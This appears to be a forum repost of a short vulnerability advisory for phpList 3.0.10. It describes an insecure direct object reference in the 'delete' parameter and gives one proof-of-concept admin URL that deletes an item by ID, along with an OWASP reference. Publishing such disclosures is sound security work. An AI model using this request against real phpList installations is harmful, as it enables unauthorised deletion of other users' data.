Jump to content
Aerosol

phpList 3.0.10 Insecure Direct Object Reference

Recommended Posts

Posted

# Affected software: phplist
# Type of vulnerability: insecure object reference
# URL:phplist.com
# Discovered by: Provensec
# Website: http://www.provensec.com

#version: phpList ltd. - v3.0.10
# Proof of concept

insecure object refrenced on page deltetation

vuln param:delete


example:

http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99

ref:
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...